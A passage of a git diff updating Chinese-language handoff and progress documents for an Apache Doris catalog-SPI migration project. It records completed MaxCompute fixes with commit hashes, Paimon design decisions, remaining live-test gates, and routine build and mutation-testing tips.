文案差、CTAS KNOWN GAP、P2-8 auto-inc 接受项);更正 `P4-maxcompute-migration.md` 的「nereids 上游已拒 auto-inc」假声明(P2-8 已证伪:nereids 仅拒 generated 列、不拒 bare auto-inc);T06c §5「记 OQ/可接受」措辞。**注:P3-9/P3-10 的 doc-sync(D-032/D-033/DV-016/DV-017)本 session 已落。** -> - **(复查) F9 CAST 谓词剥壳下推**(`ExprToConnectorExpressionConverter:108-109`, confirms 3/3, correctness/丢行风险):虽归「已登记降级」,建议二次确认真安全 / 真已登记。 -> - **(终验) live e2e(真实 ODPS)是翻闸真正完成门**(= 上面 🅰):写 blocker(动态/静态分区、INSERT OVERWRITE)+ 读裁剪 + limit-split + DESCRIBE + post-commit swallow + batch-mode 大分区 + CAST 谓词不丢行 的 DV 真值闸(**DV-013..020**)须 live 验,CI 跳。 - -> 来源全部出自 `plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md`(每条带 `file:line` + cutover↔legacy diff + 处置建议 + 历史交叉核对证据)。下面是浓缩可执行清单——**动手前按指针核码(Rule 8)**。 -> **⚠️ 把 newGaps∪disagreements 当一个"必须 triage"集**:同一根因被两个审阅者按各自查到的历史 artifact 分别归 new-gap / disagreement(静态分区 bind F19=F48;CREATE DB 预检 F23=F26),别被 status 标签的细分误导。 -> **每 issue 走既有流程**:设计→改→编译+UT+mutation→对抗 review 收敛→独立 commit + hash 回填。 - -## 🔴 P0 — 写路径 3 个 blocker(✅ 全清,2026-06-07) - -- [x] **FIX-OVERWRITE-GATE**(blocker, F42/F47)✅ **DONE @`59699a62f33`**(本轮 live tracker = `plan-doc/task-list-P4-rereview.md`;详见 `plan-doc/reviews/P4-T06e-FIX-OVERWRITE-GATE-review-rounds.md`)。⚠️**下面这句已过时**:实际未用 bare instanceof(round-1 对抗 review 证伪——会令 jdbc 静默退化 overwrite→plain INSERT 丢数据),改为 **Option A:新增 SPI capability `supportsInsertOverwrite()`(ConnectorWriteOps 默认 false / MaxCompute=true),网关经能力守门**。〔原始计划:〕`InsertOverwriteTableCommand.allowInsertOverwrite:315-323` 加 `PluginDrivenExternalTable` 分支(keyed on SPI 泛型类型,对齐 FIX-PART-GATES 决策①)。下层 OVERWRITE 机器(`:420-440`)已完整接好、只是被顶层网关挡得到不了(典型"分发只接一半")。**Batch-D 红线**:删 legacy `MaxComputeExternalTable` 分支前必须先加 PluginDriven 分支。测试(Rule 9):翻闸表 INSERT OVERWRITE 修前红(`AnalysisException "...only support OLAP..."`)、修后过网关 + 静态分区 spec 仍流。 -- [x] **FIX-WRITE-DISTRIBUTION**(blocker+major, F17/F18/F43)✅ **DONE @`f0adedba20c`**(1 轮收敛 0 must-fix;详见 `plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md`、[D-029]/[DV-013])。做法 = **Option A:新增 SPI capability `SINK_REQUIRE_PARTITION_LOCAL_SORT`**(`ConnectorCapability` 默认不声明 / MaxCompute `getCapabilities()` 声明它 + `SUPPORTS_PARALLEL_WRITE`),`PluginDrivenExternalTable.requirePartitionLocalSortOnWrite()` 读之,`getRequirePhysicalProperties()` 重写 legacy 3 分支。**关键修正 vs legacy**:分区列→child output 索引按 **cols 位置**(通用 sink child 投影到 cols 序)非 legacy full-schema。〔原始计划:〕`PhysicalConnectorTableSink.getRequirePhysicalProperties:114-121` 照搬 legacy `PhysicalMaxComputeTableSink:111-155` 三分支。**⚠️ 不只翻 `SUPPORTS_PARALLEL_WRITE`**——那缺 local-sort,动态分区照样 "writer has been closed"。**Batch-D 红线**:删 `PhysicalMaxComputeTableSink`(唯一逻辑副本)须待本 fix + P0-3 双落。**真值闸**:live e2e 跨多动态分区无 "writer has been closed" + 并行吞吐(CI 跳,须与 P0-3 一并 live 验)。 -- [x] **FIX-BIND-STATIC-PARTITION**(blocker, F19/F48)✅ **DONE @`7cc86c66440`**(3 轮收敛 0 mustFix;[D-030]/[DV-014];详见 `plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md`)。⚠️**下面原始计划不完整**——只剔除静态分区列不够:MaxCompute BE/JNI writer **按位置**映射数据到完整表 schema,故**所有** MC 写(不止静态/分区)须投影 full-schema 序(非分区/重排或部分显式列名否则静默错列/丢列)。实际做法 = **新增 SPI cap `SINK_REQUIRE_FULL_SCHEMA_ORDER`**(MaxCompute 声明 / JDBC 不声明),`bindConnectorTableSink` 据此分支(true→full-schema 投影镜像 legacy `bindMaxComputeTableSink` 全写形 + 剔除静态分区列;false→cols 序 JDBC/ES)+ `InsertUtils` VALUES 分支 + **回退 P0-2 分布索引 cols→full-schema**([D-030] 回退 [D-029])。判别键三轮 static→partitioned→capability。〔原始计划:`BindSink.bindConnectorTableSink` 剔除 `getStaticPartitionKeyValues().keySet()` + `InsertUtils:377-389` VALUES 分支〕。**doc-sync 已落**:cutover-design §4.2 + FIX-WRITE-DISTRIBUTION-design「index-by-cols」superseded 更正(随本 session commit)。**Batch-D 红线**:删 legacy `bindMaxComputeTableSink`/`PhysicalMaxComputeTableSink` 须待本 fix 落(已落)。**真值闸**:live e2e(p2 `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`);bind 投影无 fe-core analyze harness 单测 = DV-014。 - -## 🟠 P1 — 分区裁剪下推证伪(disagreement, major)✅ DONE 2026-06-08 - -- [x] **FIX-PRUNE-PUSHDOWN**(F1/F7)✅ **DONE @`072cd545c54`**(1 轮收敛 0 mustFix;[D-031]/[DV-015];详见 `plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md`)。**用户批准「Fix it」**。做法 = (a) `PluginDrivenScanNode` 加 `selectedPartitions` 字段/setter + 三态 `resolveRequiredPartitions`(NOT_PRUNED→null / pruned-非空→names / pruned-空→`getSplits` 短路无 split,镜像 legacy `MaxComputeScanNode:718-731`);`PhysicalPlanTranslator` plugin 分支注入 `setSelectedPartitions(fileScan.getSelectedPartitions())`;(b) **additive 6 参 SPI overload** —— `ConnectorScanPlanProvider.planScan(...,List requiredPartitions)` **default** 委托 5 参(零破坏 es/jdbc/hive/paimon/hudi/trino,唯 MaxCompute override),MaxCompute `toPartitionSpecs` 喂**两** read-session 路径(标准 `:201` + limit-opt `:320`,替 `Collections.emptyList()`),空选短路上移 fe-core。**契约**:null/空=全部、非空=子集、零分区 fe-core 短路不下达 SPI。**已更正**「production CLEAN / pruning 不变式 clean」裁决(FIX-PART-GATES design/review-rounds ⚠️ + D-028 ⚠️,见 doc-sync)。**Batch-D 红线**:删 legacy `MaxComputeScanNode`(读裁剪逻辑副本)须待本 fix 落(已落)。**真值闸**:live e2e p2 `test_max_compute_partition_prune.groovy` + EXPLAIN/profile 证仅扫目标分区(DV-015;CI 跳)。**与 NG-7 batch-mode 解耦但为其前置。** - -## 🟠 P2 — DB-DDL / CTAS 语义回归 ✅ 全 DONE(P2-5/6/7/8,详见 task-list-P4-rereview.md + 4 份 review-rounds) - -- [x] ✅ `99d5c9d527c` **DROP DB FORCE 级联**(disagreement major, F22/F27):先用真实 ODPS 验 `schemas().delete` 对非空库行为。若拒删 → 在 `PluginDrivenExternalCatalog.dropDb:337-355` 的 `force==true` 时枚举+dropTable(或扩 SPI 带 force/cascade)。若不支持 → 至少 fail-loud(force+非空库抛明确错)+ 登记 deviation。**别把 T06c §5"记 OQ/可接受"当作已解决**(后续对抗 review 已推翻该定级)。 -- [x] ✅ `ff52f8fd478`(能力门闸 supportsCreateDatabase,jdbc/es/trino 字节不变)**CREATE DB IF NOT EXISTS 远端预检**(disagreement major, F26/F23):重开 DDL-C4。`createDb:312-326` 在 `ifNotExists && getDbNullable==null` 时先查 `connector...databaseExists`(已暴露、无需改 SPI 签名)。UT + mutation。或登记 deviation——别留"孤儿修 verdict"(task-list `:12` 称 6/6 完成但此条无 fix commit、亦无 deviation)。 -- [x] ✅ `7051b75c197`(FE-only;⚠️ 暴 KNOWN PRE-EXISTING GAP:非-IFNE+本地-only 不 fail-loud,待用户定)**CTAS IF-NOT-EXISTS 误写已存在表**(disagreement, DDL-C5 minor→**major**, F33):`createTable:264-300` 区分"新建 vs 已存在"——IF-NOT-EXISTS 命中 → 返回 true + 跳 editlog + 跳 `resetMetaCacheNames`(镜像 legacy `createTableImpl:179-197` → `ExternalCatalog:1063-1075`)。测试:CTAS-IF-NOT-EXISTS 对已存在表**不**INSERT + editlog 未写。(历史只分析了 editlog 冗余那半、漏了数据变更后果。) -- [x] ✅ `4aa680f3e3b`(加 SPI 字段 ConnectorColumn.isAutoInc)**AUTO_INCREMENT 拒绝丢失**(disagreement minor, F24):定夺 (a) `ConnectorColumn` 加 `isAutoInc` 透传 + `validateColumns` 重校验;或 (b) 接受+登记 deviation + 更正 `P4-maxcompute-migration.md:117` 的假声明("nereids 上游已拒"对 auto-inc 为假)。聚合列那半已被非-OLAP key 路径覆盖、无需单独修。 - -## 🟡 P3 — 写并行 / 读默认 / minors - -- [x] **limit-split 默认反转**(major, F11)✅ **DONE @`952b08e0cc8`**(1 轮 impl-review 收敛,1 mustFix→补测;[D-032]/[DV-016];详见 `plan-doc/reviews/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-review-rounds.md`)。**用户定 Fix(恢复三重闸)**。做法 = **连接器局部、无 SPI 变更**:① 加 hardcode 常量 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` 经 `ConnectorSession.getSessionProperties()`(live 由 `from(ctx)`→`VariableMgr.toMap` 填,禁依赖 fe-core `SessionVariable`,同 JDBC 约定)读 gate(1);② 实 `checkOnlyPartitionEquality` 遍历 `ConnectorExpression` 树镜像 legacy `checkOnlyPartitionEqualityPredicate`;③ 纯静态 `shouldUseLimitOptimization` 合成 gate(1)&&gate(3)&&gate(2),默认 OFF=保守回退 legacy。**并闭 minors F2/F12**(旧恒 false stub)。〔原始计划:透传 session-var + 实现 checkOnlyPartitionEquality 恢复三重闸;或接受"默认优化无过滤 LIMIT"+DV〕。**真值闸**:CI-skip live e2e(var OFF→多 split / var ON+分区等值+LIMIT→单 row-offset split,EXPLAIN/profile 证)= DV-016 wiring 半。 -- [x] **isKey=false 元数据分歧**(minor, F3/F10)✅ **DONE @`1b44cd4f065`**(设计验证+impl review 各 0 mustFix;[D-033]/[DV-017];详见 `plan-doc/reviews/P4-T06e-FIX-ISKEY-METADATA-review-rounds.md`)。**用户定 Fix(isKey=true)**。做法 = **连接器局部、无 SPI 变更**:抽 `buildColumn(...)` 静态助手用 6 参 ctor 置 isKey=true,`getTableSchema` data+partition 两 loop 经之(converter 已透传 isKey)。**作用域更正**:仅影响 `DESCRIBE`(`information_schema.columns.COLUMN_KEY` 受 `FrontendServiceImpl:962-965` OlapTable 门控、MC 前后皆空、已 parity);isKey 非纯展示(亦喂 `UnequalPredicateInfer`/BE descriptor)但 legacy 即喂 true→恢复既有值。〔原始计划:两列循环改 6 参 `ConnectorColumn(...,true)`;或接受+DV〕。**真值闸**:CI-skip live e2e `DESCRIBE ` 显 Key=YES(wiring 半,DV-017)。 -- [x] **丢 batch-mode 异步 split**(minor, F6/F13)✅ **DONE @`ac8f0fc15eb`**([D-035]/[DV-019];详见 `tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md` + 设计验证 `wcpg9lblj` / impl-review `wve7y1jst` 各 GO-WITH-EDITS)。**用户定「实现 batch SPI 路径」(Shape A 薄 SPI + fe-core 编排、逐字镜像 legacy)**:① SPI `ConnectorScanPlanProvider` +2 additive default(`supportsBatchScan` false / `planScanForPartitionBatch` 委托 6 参 planScan)零破坏其余 6 连接器;② 连接器 `supportsBatchScan`=`odpsTable.getFileNum()>0`;③ fe-core `PluginDrivenScanNode`(已继承 batch dispatch+stop,`PluginDrivenSplit extends FileSplit` 故 `:381` 转型安全)override `isBatchMode`(4 闸+SF-1 null-guard)/`numApproximateSplits`/`startSplit`(getScheduleExecutor outer/inner CompletableFuture + SplitAssignment 契约,DEC-1 不下推 limit 传 -1) + 抽纯静态 `shouldUseBatchMode`。守门:编译/fe-core UT 9-9/fe-connector-api UT 2-2/checkstyle 0/import-gate/mutation 5-5 向红。**Batch-D 红线**:本 fix 落地才解锁删 legacy `MaxComputeScanNode` batch 逻辑副本(读裁剪那半 P1-4 已清,本项为最后前置闸;已在 `P4-batchD-maxcompute-removal-design.md` 加限定注)。**真值闸**:大分区 live e2e(EXPLAIN/profile 证 batched/streamed、耗时/内存≪同步路)=DV-019、CI 跳。**🎉 P3 全清。** - - **operational 坑(auto-memory 已记)**:mutation 跑中 `/mnt/disk1` 系统级满(非本 repo)致 cp 还原失败一度 truncate 产线文件→已从 `/dev/shm` 备份还原;教训=mutation 备份须放 RAM/异盘。 -- [x] **post-commit refresh 吞异常**(minor, regression=no, F15=F21)✅ **DONE @`1f2e00d3696`**([D-034]/[DV-018];详见 `tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md`)。**用户定 DV+Javadoc 泛化、不回退 legacy 传播失败**。**无产线逻辑改动**:仅 `PluginDrivenInsertExecutor.doAfterCommit` 的 Javadoc(`:164-176`)从「只讲 JDBC_WRITE」泛化到覆盖 connector-transaction(MC) 路径——两路径数据在 doAfterCommit 时均已持久、`super.doAfterCommit`(=`handleRefreshTable`) 只刷 FE 缓存 + 写 external-table refresh editlog(follower 失效提示、非数据真相源)、丢失只致 follower 缓存暂 stale 自愈。对抗性安全核查 inline 0 mustFix。守门 checkstyle 0、import-gate 净。**真值闸**:CI-skip live e2e(MC INSERT 提交后人为令 refresh 失败→断言报 OK+warn)。 - -## ⛓️ 横切 / 别忘 - -- [ ] **Batch-D 红线扩充**:删 legacy 前须先在 PluginDriven/connector 路径补齐 → `PhysicalMaxComputeTableSink`(写分发唯一副本)、`allowInsertOverwrite` 的 MC 分支、`bindMaxComputeTableSink` 静态分区过滤、**`MaxComputeScanNode` 读裁剪下推(P1-4 已补 plugin 侧)**。复查 Batch-D 设计对这些文件的"zero survivor"声明(连同既有 `PartitionsTableValuedFunction` 红线)。 -- [x] **F9 CAST 剥壳下推复查** ✅ **DONE @`cc32521ed99`**([D-036]/[DV-020];详见 `tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md`)。**复查推翻 review 的「已登记降级」定级**:对抗核验 `wzoa6dkvw` **0/3 refuted**、verdict=**real-unregistered-regression**——MaxCompute 继承 `supportsCastPredicatePushdown=true`、剥壳谓词推 ODPS 源端 under-match(`CAST(str AS INT)=5`→`str="5"` 丢 `'05'/' 5'`)、BE 复算无法找回源端已丢行;legacy 丢弃 CAST 谓词(BE-only)故正确 ⇒ **回归**(非 DV-016 的 limit-opt 资格 CAST-unwrap)。**用户定 Fix**:① 连接器 `supportsCastPredicatePushdown→false`(激活既有 strip、恢复 legacy parity);② fe-core `getSplits` 剥壳时抑制 source LIMIT(impl-review `wj2h0120n` F9-LIMITOPT-1:否则空 filter 触发 limit-opt under-return)。守门 连接器 UT2-2+mut / fe-core LimitStrip2-2+BatchMode9-9+mut2-2 / checkstyle 0 / import-gate。真值闸 live ODPS=DV-020。**out-of-scope surface**:JDBC `applyLimit`+cast-off 理论同类(MC 不 override applyLimit、本修对 MC 完整),DV-020 备查。 -- [~] **doc-sync**:P0-1/P0-2/P0-3 + **P1-4 已落并 commit**(decisions-log D-027..D-031、deviations-log DV-013/DV-014/DV-015、cutover-design §4.2、FIX-WRITE-DISTRIBUTION-design index-by-cols superseded、**FIX-PART-GATES design/review-rounds「pruning 不变式 clean」⚠️ 更正 + D-028 ⚠️ 补注(DG-1✅)**、本 HANDOFF、task-list)。**剩余(随 P2+ 处理)**:DG-2 证伪 DECISION-3「忠实镜像」、DG-4/DG-6 task-list「6/6 完成」措辞,各 P2+ 项落地时同步 design/log。 - ---- -## ⚙️ 操作须知(无结论,纯工程) -- **maven 必绝对 `-f` + `-pl :artifactId`**:改 fe-core 带 `:fe-core -am`;改连接器带 `:fe-connector-maxcompute`。读真实 `BUILD SUCCESS/FAILURE` 与尾部 `echo "MVN_EXIT=$?"`;**勿信**后台 task-notification 的 exit code。 -- **build cache 坑**:守门/跑测带 `-Dmaven.build.cache.enabled=false`,否则会 restore 旧 build 且 **surefire XML 可能 stale**(前序 session 多次踩到:mutation 跑出 BUILD FAILURE 但读到旧 XML 显示 0 fail)。直接读 mvn 输出的 `Tests run:` 行,别只读 XML。 -- **checkstyle**:`-pl :fe-core checkstyle:check`;`CustomImportOrder`(doris→第三方[com.*/org.* 非 doris]→java)/`UnusedImports`/`LineLength 120`;扫 test 源。 -- **import-gate**:`bash tools/check-connector-imports.sh`(repo 根跑)。 -- **分支**:`catalog-spi-05`,本地;未跟踪 `.audit-scratch/` `conf.cmy/` `regression-conf.groovy.bak`(勿提交)。 -- **mutation 验证技巧**:改产线一处→跑相关 UT→确认对应 test 变红→还原。用 `cp` 备份产线文件做 mutation(比 perl 删块安全——perl 易匹配到首个同名 `if` 误删方法)。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(**须 -am 连带 rebuild**)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器禁 import fe-core(import-gate `bash tools/check-connector-imports.sh`);session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、test 阶段不跑(单独 `checkstyle:check`)。 +- 翻闸 GSON **7 注册原子齐迁**(5 catalog + db + table,比 MC 多,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy 后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 +- 分支 `branch-catalog-spi`(HEAD `e96037cf6aa` #64300);建议 off 最新 upstream 起新分支。未跟踪 scratch(`.audit-scratch/`/`conf.cmy/`/`*.bak`/`.claude/scheduled_tasks.lock`)勿提交。 ## 🧠 给下一个 agent 的 meta -- **live e2e(真实 ODPS)仍是翻闸真正完成门**——本复审是静态代码层面的高置信判定,**不替代 e2e**;写路径 blocker(动态/静态分区 / INSERT OVERWRITE)最终须 live 验。runbook 见 `git show` 历史 HANDOFF 或 decisions-log。 -- 复审脚本可复用:`plan-doc/reviews/maxcompute-full-rereview.workflow.js`(clean-room 编排,Phase A/B 只读码、Phase C 解禁先验;args 可调 `verifyVotes/lensesPerDomain/includeBe`)。clean-room 偏好见 auto-memory `clean-room-adversarial-review-pref`。 -- 先验/历史交叉核对账(P4-T06d designs/reviews、cutover-fix-design、decisions/deviations-log、task-list)即将随上述修复更新——改前先读对应条目(Rule 8)。 -
+- **D-037/D-038 已签字** —— 直接按设计 doc 的 B0–B9 落地,无须重开 scope 讨论。 +- **live e2e(真实 paimon 各 flavor 环境)仍是翻闸真正完成门**(CI 跳),翻闸前须用户验。 +- **MTMV 单-pin 不变式**是最高 correctness 风险,B5 必须一次物化分区集 + at-snapshot listPartitions;`lastFileCreationTime()` 跨 flavor 可靠性须 live 验。 +- auto-memory:[[catalog-spi-p5-paimon-design]](本 session 决策 + 3 证伪先验索引)。 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index a5acbbd78ddc16..bf2d46b4faf532 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute 完成 ✅(已合入),P5 paimon 待启动(下一 session)**——P4 full-adopter 迁移 + live 翻闸 + legacy 删除全部完成并合入 `branch-catalog-spi`:**#64253**(T01–T06 连接器全适配 + `CatalogFactory.SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,fe-core 依赖树**彻底无 odps**,HEAD `e96037cf6aa`);upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI 并随 #64300 合入。前序 P0/P1/P2(#63582/#63641/#64096)+ P3 hybrid(#64143)均已合入。**下一阶段 = P5 paimon 迁移**(复用 P4 full-adopter 写 SPI 样板;kickoff = recon + 设计)。| 项目总进度:**~32%**(按 §一 进度条加权:P0+P1+P2+P4 满 + P3 hybrid 45%,约 7.9/25 周) +> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute 完成 ✅(已合入),P5 paimon recon+设计完成(D-037/D-038 已签字,待分批实现)**——P4 full-adopter 迁移 + live 翻闸 + legacy 删除全部完成并合入 `branch-catalog-spi`:**#64253**(T01–T06 连接器全适配 + `CatalogFactory.SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,fe-core 依赖树**彻底无 odps**,HEAD `e96037cf6aa`);upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI 并随 #64300 合入。前序 P0/P1/P2(#63582/#63641/#64096)+ P3 hybrid(#64143)均已合入。**P5 paimon recon+设计完成 2026-06-09**(recon `research/p5-paimon-migration-recon.md` + 设计 `tasks/P5-paimon-migration.md`,30 TODO/B0–B9;D-037 flavor=单 Catalog、D-038 MTMV/MVCC P5 内实现 已签字;下一步分批实现,B0/B1/B6 可先行)。| 项目总进度:**~33%**(按 §一 进度条加权:P0+P1+P2+P4 满 + P3 hybrid 45% + P5 设计 ~5%,约 8.0/25 周) > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -14,7 +14,7 @@ | **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 已合入 `branch-catalog-spi`(#64096,squash `0793f032662`;T12 回归推迟 DV-003)| [tasks/P2](./tasks/P2-trino-connector-migration.md) | | P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | ✅ hybrid(D-019)批 A–D 已合入 `branch-catalog-spi`(**#64143** squash `5c240dc7a34`);批 E(live cutover)并入 P7 | [tasks/P3](./tasks/P3-hudi-migration.md) | | **P4** | maxcompute 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成并合入 `branch-catalog-spi`(**#64253** T01–T06 适配+翻闸 + **#64300** T07–T09 删 legacy/odps-free;含 #64119 校验迁移)| [tasks/P4](./tasks/P4-maxcompute-migration.md) | -| **P5** | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | 🔜 **下一阶段**(本 session 后启动;recon+设计先行)| —(kickoff 时建 tasks/P5)| +| **P5** | paimon 迁移 | 3 周 | ▰▱▱▱▱▱▱▱▱▱ 5% | 🚧 **recon+设计完成**(D-037/D-038 已签字;待分批实现 B0–B9)| [tasks/P5](./tasks/P5-paimon-migration.md) + [recon](./research/p5-paimon-migration-recon.md) | | P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -34,7 +34,7 @@ | trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | | hudi | 🟡(D-005 区分符 + D-020 模型 dispatch 已设计;实现批 E)| 🟨 55%(读路径 dormant + 批 C 测试基线)| ❌(gate 关)| ❌ | 0/0(寄生 hms)| **25%** | [详情](./connectors/hudi.md) | | maxcompute | ✅ | ✅ 100% | ✅ **已合入 #64253** | ✅ **#64300 已删** | ✅ 0/0 | **100%** | [详情](./connectors/maxcompute.md) | -| paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | +| paimon | ✅(设计定稿 D-037/D-038)| 🟨 50%(read 骨架;DDL/sys/MVCC/MTMV 待)| ❌(gate 关)| ❌ | 0/10 | **25%** | [详情](./connectors/paimon.md) | | iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | | hive (+hms) | 🟡 | 🟥 20% | ❌ | ❌ | 0/31 | **10%** | [详情](./connectors/hive.md) | @@ -44,12 +44,14 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P5 — paimon 迁移(🔜 下一 session 启动:recon + 设计先行) +### P5 — paimon 迁移(🚧 recon+设计完成 2026-06-09,D-037/D-038 已签字,待分批实现) -> 策略 = **full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。kickoff = code-grounded recon → 设计 + 批次计划(`tasks/P5-paimon-migration.md`)→ 用户签字 → 分批实现 + 独立 commit。详见 [HANDOFF 第 19 次](./HANDOFF.md) + [paimon 连接器档](./connectors/paimon.md) + master plan [§3.6](./00-connector-migration-master-plan.md)。 +> 策略 = **full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。recon `research/p5-paimon-migration-recon.md` + 设计 `tasks/P5-paimon-migration.md`(30 TODO / B0–B9 批 + old→new 映射 + 批次依赖图)。覆盖 5 功能区:普通读/系统表/procedure/DDL/mtmv。 > -> **已知范围**(master §3.6 + 连接器档,待 recon 校正):① port `PaimonMetadataOps`→`PaimonConnectorMetadata`(注意 partitionStatistics / bucketing);② **6 个 catalog flavor**(HMS/DLF/REST/File/Base/Factory)连接器内工厂重组(`PaimonConnectorProvider.create()`);③ MVCC(E5 `PaimonMvccSnapshot`)/ vended creds(E6 `PaimonVendedCredentialsProvider`)/ sys-tables(E7 `PaimonSysExternalTable`)承接 P0 新增 SPI —— **paimon 是首个真正消费 E5/E6/E7 的 adopter**(MC 未用);④ 删 fe-core 重复 `PaimonPredicateConverter`(**P1-T02 推迟项,仍在** `datasource/paimon/source/`);⑤ 清 **10 处**反向 `instanceof PaimonExternal*`;⑥ 删 `datasource/paimon/`(22 顶层 + source/ + profile/)。 -> **前置风险**:R-004(classloader 打破 SDK 单例,paimon 明列)、R-007(FE/BE 共享 jar 冲突)、R-012(snapshotId 类型)。**关联决策**:D-005(HMS flavor 走 `tableFormatType`)、D-006(cache 放连接器内)。 +> **已签字决策**:**D-037**=flavor(hms/filesystem/dlf/rest/jdbc) 走单 Catalog + `createCatalog` flavor switch(MC 一致,**非** backend 模块——5 个 backend 模块是空壳);**D-038**=MTMV/MVCC 桥 P5 内实现(fe-core `PaimonPluginDrivenExternalTable`),翻闸(B7) gated on 它(B5),禁静默读 latest。 +> **校正先验**(recon + 对抗复审证伪):① 「6 flavor 工厂已重组」假(backend 模块空壳,连接器走单 Catalog stub);② 「FE 分发全缺」假(DROP/CREATE·DROP DB/SHOW PARTITIONS/TVF 已部分预接,残留=连接器 `listPartitions*`);③ 「Base64 blocker」假(BE 有 STD fallback,真风险=pin paimon-core 三方版本对齐)。procedure 区=**零可迁 doc-only**。 +> **关键 SPI 缺口**:E7 sys-table hook(greenfield 须新增 default-no-op)、E10 MTMV(无面,经 fe-core 子类桥)、E5 MVCC(首个真消费者,须 wire)、E6 vended(REST flavor 需,可延后);删 fe-core 重复 `PaimonPredicateConverter`(**P1-T02 推迟项**)+ 清 10 处反向 `instanceof`。 +> **前置风险**:R-004(classloader SDK 单例)、R-007(FE/BE 共享 jar)、R-012(snapshotId 类型)。**最高 correctness 风险**:MTMV 单-pin 不变式 + `lastFileCreationTime()` 跨 flavor 可靠性(须 live 验)。**关联决策**:D-037、D-038、D-005、D-006。 ### P4 — maxcompute 迁移(✅ 已完成并合入:**#64253** T01–T06 适配+翻闸 + **#64300** T07–T09 删 legacy/odps-free;含 #64119 校验迁移) @@ -147,6 +149,7 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-09(设计里程碑 · P5 kickoff)** ✅ **P5 paimon recon + 设计完成**(0 产线代码):14-agent code-grounded recon + cross-cut 对抗复审,产 [recon](./research/p5-paimon-migration-recon.md)(5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面风险 + MC 一致性 11 约定)+ [设计 doc](./tasks/P5-paimon-migration.md)(old→new 映射 + 30 TODO/B0–B9 + 验收 + 批次依赖图)。**用户签字 D-037**(flavor=单 Catalog + `createCatalog` switch,**非** backend 模块)/ **D-038**(MTMV/MVCC 桥 P5 内实现,翻闸 gated on B5,禁静默读 latest)。**证伪 3 先验**:backend 模块空壳(连接器走单 Catalog stub)、FE 分发部分已预接(残留=连接器 listPartitions)、Base64 非 blocker(BE 有 STD fallback)。procedure 区=零可迁 doc-only(expire_snapshots=iceberg、CALL migrate_table=Spark 两假阳性)。**下一 = B0 测试基建 + parity baseline 起分批实现**。 - **2026-06-09(阶段里程碑 · P4 完成)** ✅ **P4 maxcompute 迁移全部完成并合入 `branch-catalog-spi`** —— **#64253**(T01–T06 连接器 full 适配 + live 翻闸 `SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core legacy 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,`fe-core dependency:tree | grep odps`=∅,HEAD `e96037cf6aa`)。upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI(`validateMaxComputeConnection`/`checkOperationSupported`,连接器 UT 101/0/0/1)并随 #64300 squash 合入(`git log -S` 证)。fe-core **彻底无 odps**(代码 + 依赖树)。本 session = 交接文档同步(PROGRESS + HANDOFF 第 19 次),0 产线代码;**下一 session = P5 paimon 迁移 